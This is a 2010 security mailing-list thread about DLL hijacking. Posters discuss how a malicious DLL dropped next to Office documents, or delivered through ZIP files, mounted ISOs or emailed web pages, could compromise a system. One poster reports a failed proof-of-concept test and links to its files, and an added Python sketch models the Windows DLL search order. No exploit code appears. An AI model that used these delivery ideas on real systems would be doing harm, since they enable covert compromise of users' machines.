> I will admit, at 3AM when I've been working for 18 hours and awake for
> 36, it is possible that I may double-click
> such a malicious file and then immediately think OH shit and rebuild.


That's the real threat of this, to be honest.  Yes, you, me, and
(hopefully) the rest of the people on this list know what to look for
before clicking on something.  But, do you view a .doc, or .ppt, or
.mp3 as malicious and threatening as a .exe, .bat, or .vbs?  Probably
not.


And, you cannot honestly tell me that you've never browsed to a
network share and opened a Word document.  And, if that Word document
opens and there's legitimate data being displayed (ie - it's the
document that you were expecting to open), would you ever consider
that you just compromised your system?


I think that's what a lot of you are missing.. there's no real
trickery involved; No changing of icons, no hiding extensions, no fake
files.. a DLL could be dropped into any directory containing Office
documents and now each one of those Office documents is, essentially,
backdoored.  And, not only that, but this is affecting file formats
which were previously considered benign or harmless (for the most
part).


- matt

www.attackvector.org

Re: [Full-disclosure] DLL hijacking with Autorun on a USB drive

2010-09-01 Thread paul . szabo
Charles Morris cmor...@cs.odu.edu wrote:

> ... complaining about this since 1999.

Since 1998 at least, see:
  Microsoft warns of DLL vulnerability in applications
  http://www.h-online.com/security/news/item/Microsoft-warns-of-DLL-vulnerability-in-applications-1064584.html
... the NSA warned [PDF] of the problem of DLL spoofing in its
Windows NT Security Guidelines 12 years ago.
http://packetstormsecurity.org/NT/audit/NSAGuidePlus.PDF

(Does anyone have older references?)

Cheers, Paul

Paul Szabo   p...@maths.usyd.edu.au   http://www.maths.usyd.edu.au/u/psz/
School of Mathematics and Statistics   University of Sydney   Australia



[Full-disclosure] DLL hijacking with ZIP files in email?

2010-09-01 Thread paul . szabo
The essence of DLL hijacking is to deliver an innocent file together
with a malicious DLL, in the one directory. Would it be possible to do
this via email: a ZIP (or similar) archive containing the two files?

Thoughts about this? I know that an emailed ZIP is searchable by
desktop AV systems; but the signature-based AVs forever play catch-up
with the attacks in the wild.

Cheers, Paul

Paul Szabo   p...@maths.usyd.edu.au   http://www.maths.usyd.edu.au/u/psz/
School of Mathematics and Statistics   University of Sydney   Australia



Re: [Full-disclosure] DLL hijacking with ZIP files in email?

2010-09-01 Thread coderman
On Wed, Sep 1, 2010 at 2:05 PM,  paul.sz...@sydney.edu.au wrote:
> The essence of DLL hijacking is to deliver an innocent file together
> with a malicious DLL, in the one directory. Would it be possible to do
> this via email: a ZIP (or similar) archive containing the two files?

i don't know of a way to do this with ZIP archives. the daemontools /
easycd / related tools which automount ISO and other archive images as
drive letters on the host are vulnerable.  autorun on/off may add
insult to injury with such services...



Re: [Full-disclosure] DLL hijacking with ZIP files in email?

2010-09-01 Thread Mario Vilas
if you email a web page, typically all files are unzipped when the user
double clicks on any .html file

but I still don't see this as something drastically different from double
clicking on exe files...

On Thu, Sep 2, 2010 at 12:45 AM, coderman coder...@gmail.com wrote:

> On Wed, Sep 1, 2010 at 2:05 PM,  paul.sz...@sydney.edu.au wrote:
> > The essence of DLL hijacking is to deliver an innocent file together
> > with a malicious DLL, in the one directory. Would it be possible to do
> > this via email: a ZIP (or similar) archive containing the two files?
>
> i don't know of a way to do this with ZIP archives. the daemontools /
> easycd / related tools which automount ISO and other archive images as
> drive letters on the host are vulnerable.  autorun on/off may add
> insult to injury with such services...





-- 
HONEY: I want to… put some powder on my nose.
GEORGE: Martha, won’t you show her where we keep the euphemism?

Re: [Full-disclosure] DLL hijacking with Autorun on a USB drive

2010-09-01 Thread Christian Sciberras
No one is saying there's no threat. It's the way people are going
about it that is making the difference.

Patching the vulnerable application won't fix this whole issue.
Removing the feature from Windows core will surely break a lot of programs.

Truth is, that dll shouldn't have been in that network share in the first place.
And that's the whole difference between Unix-like and Windows.
Once something gets into Windows, by design, you are allowing a great
deal of access.
Ok, as of late they made strides in securing this area, but it wasn't
designed this way.

The focus should be on keeping that darn dll out of your trusted zone,
not what to do with it when it is inside.

As the saying goes, prevention is better than cure.


Cheers,
Chris.



On Wed, Sep 1, 2010 at 9:47 PM, matt m...@attackvector.org wrote:
> And yeah, I find it a joke that you think that .ppt.exe isn't pretty
> damn obvious.
>
> I might have fallen for that when I was 9, but I haven't had a problem
> with a windows box in years.
>
> I will admit, at 3AM when I've been working for 18 hours and awake for
> 36, it is possible that I may double-click
> such a malicious file and then immediately think OH shit and rebuild.
>
> That's the real threat of this, to be honest.  Yes, you, me, and (hopefully)
> the rest of the people on this list know what to look for before clicking on
> something.  But, do you view a .doc, or .ppt, or .mp3 as malicious and
> threatening as a .exe, .bat, or .vbs?  Probably not.
>
> And, you cannot honestly tell me that you've never browsed to a network
> share and opened a Word document.  And, if that Word document opens and
> there's legitimate data being displayed (ie - it's the document that you
> were expecting to open), would you ever consider that you just compromised
> your system?
>
> I think that's what a lot of you are missing.. there's no real trickery
> involved; No changing of icons, no hiding extensions, no fake files.. a DLL
> could be dropped into any directory containing Office documents and now each
> one of those Office documents is, essentially, backdoored.  And, not only
> that, but this is affecting file formats which were previously considered
> benign or harmless (for the most part).
>
> - matt
>
> www.attackvector.org






[Full-disclosure] DLL hijacking POC (failed, see for yourself)

2010-09-01 Thread Christian Sciberras
I wrote my own example POC.

The files described herein can be found at:
http://www.megafileupload.com/en/file/264741/DHPOC-zip.html

The above zip file contains: binaries, sources, example (folder structure)

The source code is in Pascal, written in Lazarus to be precise.

There are 3 executables: dhpocApp.exe, dhpocDll.good.dll, dhpocDll.bad.dll
The 2 dlls are renamed to dhpocDll.dll during tests (the example structure):

DHPOC\example\the-install-folder\
DHPOC\example\the-install-folder\dhpocApp.exe
DHPOC\example\the-install-folder\dhpocDll.dll
DHPOC\example\the-remote-folder
DHPOC\example\the-remote-folder\example.dhpoc
DHPOC\example\the-remote-folder\dhpocDll.dll

While testing this, I noticed that the dll hijack exploit completely
failed my tests (on Windows 7 64bit).
That is, the dll inside the-remote-folder was never loaded, that is,
even when example.dhpoc was opened.
Also note that in order to fully test it out, I also chdir'd to the
target file directory, ie, the-remote-folder; to no avail.

The only way I got it working was by renaming/deleting dhpocDll.dll in
the-install-folder to something else, in which case running
dhpocApp.exe failed while opening example.dhpoc caused the bad dll to
load.

Finally, I tried testing the zip issue mentioned lately.

With everything set up correctly (zipped the-remote-folder and
the-install-folder uncompressed), it worked as expected, ie the good
dll was loaded.
After removing the dll from the-install-folder, the program ceased to
work correctly, ie, it neither loaded the zipped dll nor could it load
the initial dll.




I ran these tests and wrote this code in under an hour, so I can
guarantee there might be serious flaws around, or things which I
should have tested but didn't.
So far, I've run these tests twice, so unless I've got a software
fault (which somehow made the software secure?!), this dll hijack
issue is either a thing of the past, pretty rare, or, pretty much
useless (consider the recent POC where the user was required to open a
contact book several times before it hopefully worked...).



Cheers,
Christian Sciberras.

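The load-order behaviour reported in the post above, as an added Python model that is not part of the original message or the DHPOC sources: it resolves a bare DLL name against the documented default Windows search order, using the post's folder layout as a constructed file system. The `C:\` prefix, the function names and the `cwd_allowed` switch (standing in for a process that calls `SetDllDirectory("")`) are assumptions.

```python
"""Model of the default Windows DLL search order for a bare DLL name.
Added illustration only; KnownDLLs, manifests and already-loaded modules
are deliberately left out."""
import ntpath

# Constructed paths mirroring the folder layout in the post (drive letter assumed).
INSTALL = r"C:\DHPOC\example\the-install-folder"
REMOTE = r"C:\DHPOC\example\the-remote-folder"
SYSTEM_DIRS = [r"C:\Windows\System32", r"C:\Windows\System", r"C:\Windows"]
DLL = "dhpocDll.dll"


def search_order(app_dir, cwd, path_dirs=(), safe_search=True, cwd_allowed=True):
    """Return the directories searched, in order, for a bare DLL name.

    safe_search models SafeDllSearchMode, which moves the current directory
    behind the system directories. cwd_allowed=False models a process that
    removed the current directory from the search (hypothetical switch).
    """
    order = [app_dir]                        # directory the EXE was loaded from
    cwd_part = [cwd] if cwd_allowed else []
    if safe_search:
        order += SYSTEM_DIRS + cwd_part      # current directory after system dirs
    else:
        order += cwd_part + SYSTEM_DIRS      # legacy order: current directory second
    return order + list(path_dirs)           # PATH entries come last


def resolve(dll, files, **ctx):
    """Return the full path of the first match, or None if the load would fail."""
    present = {f.lower() for f in files}     # Windows file names are case-insensitive
    for directory in search_order(**ctx):
        candidate = ntpath.join(directory, dll)
        if candidate.lower() in present:
            return candidate
    return None


def scenarios():
    """Replay the post's tests: app in the install folder, cwd = remote folder."""
    good = ntpath.join(INSTALL, DLL)         # stands for dhpocDll.good.dll, renamed
    bad = ntpath.join(REMOTE, DLL)           # stands for dhpocDll.bad.dll, renamed
    ctx = dict(app_dir=INSTALL, cwd=REMOTE)
    return {
        "both copies present": resolve(DLL, [good, bad], **ctx),
        "install copy removed": resolve(DLL, [bad], **ctx),
        "install copy removed, cwd excluded":
            resolve(DLL, [bad], cwd_allowed=False, **ctx),
    }


if __name__ == "__main__":
    for name, hit in scenarios().items():
        print(f"{name:36} -> {hit}")
```

In this model the current directory is consulted only when the name is missing from the application and system directories, which matches the one case in the post where the bad DLL loaded.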


Re: [Full-disclosure] DLL hijacking POC (failed, see for yourself)

2010-09-01 Thread p8x
Hi Christian,

I noticed MS pushed out an update a couple of days ago - on the PCs
that have had the update applied the POC does not work for me, whereas
on an unpatched machine the POC works.

Has that update been installed?

p8x

On 2/09/2010 7:43 AM, Christian Sciberras wrote:
> I wrote my own example POC.
>
> The files described herein can be found at:
> http://www.megafileupload.com/en/file/264741/DHPOC-zip.html
>
> The above zip file contains: binaries, sources, example (folder structure)
>
> The source code is in Pascal, written in Lazarus to be precise.
>
> There are 3 executables: dhpocApp.exe, dhpocDll.good.dll, dhpocDll.bad.dll
> The 2 dlls are renamed to dhpocDll.dll during tests (the example structure):
>
> DHPOC\example\the-install-folder\
> DHPOC\example\the-install-folder\dhpocApp.exe
> DHPOC\example\the-install-folder\dhpocDll.dll
> DHPOC\example\the-remote-folder
> DHPOC\example\the-remote-folder\example.dhpoc
> DHPOC\example\the-remote-folder\dhpocDll.dll
>
> While testing this, I noticed that the dll hijack exploit completely
> failed my tests (on Windows 7 64bit).
> That is, the dll inside the-remote-folder was never loaded, that is,
> even when example.dhpoc was opened.
> Also note that in order to fully test it out, I also chdir'd to the
> target file directory, ie, the-remote-folder; to no avail.
>
> The only way I got it working was by renaming/deleting dhpocDll.dll in
> the-install-folder to something else, in which case running
> dhpocApp.exe failed while opening example.dhpoc caused the bad dll to
> load.
>
> Finally, I tried testing the zip issue mentioned lately.
>
> With everything set up correctly (zipped the-remote-folder and
> the-install-folder uncompressed), it worked as expected, ie the good
> dll was loaded.
> After removing the dll from the-install-folder, the program ceased to
> work correctly, ie, it neither loaded the zipped dll nor could it load
> the initial dll.
>
> I ran these tests and wrote this code in under an hour, so I can
> guarantee there might be serious flaws around, or things which I
> should have tested but didn't.
> So far, I've run these tests twice, so unless I've got a software
> fault (which somehow made the software secure?!), this dll hijack
> issue is either a thing of the past, pretty rare, or, pretty much
> useless (consider the recent POC where the user was required to open a
> contact book several times before it hopefully worked...).
>
> Cheers,
> Christian Sciberras.

